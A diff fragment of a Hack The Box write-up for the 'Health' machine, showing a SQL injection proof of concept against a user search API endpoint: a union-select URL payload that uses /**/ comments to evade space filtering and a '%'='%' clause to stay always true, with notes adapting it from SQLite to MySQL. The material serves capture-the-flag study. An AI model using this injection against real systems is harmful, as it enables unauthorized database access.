blnknlights/blnknlights.github.io/htb/machines/health/health.md

 select * from user where (type=0 and lower_name like '%<keyword>%');
 ```

-That's the proof of concept, in the report, we'll need to tweak it as their instance is using mysql
+That's the proof of concept, in the report, we'll need to tweak it as it's using mysql and not sqlite
 ```
 http://www.example.com/api/v1/users/search?q='/**/and/**/false)/**/union/**/select/**/null,null,@@version,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/mysql.db/**/where/**/('%25'%3D'
 ```

 playing on the local instance:
 union all does not drop duplicates
-@@version of courlse is only relevant for mysql, since  we're working on a sqlite.db we can use `select sqlite_version()`
+@@version of course is only relevant for mysql, since  we're working on a sqlite.db we can use `select sqlite_version()`
 %25 = "%"
 %3D = "="
 `'%25'%3D` is `'%'=` to escape the `%'` at the end, so that the where clause is `'%'='%'` meaning it's always true
 `/**/` are empty comments, but will work as spaces if it was just a urlencode issue we could have used + but the code actually filters down spaces

 We got it working on the sqlite3 cli:
 ```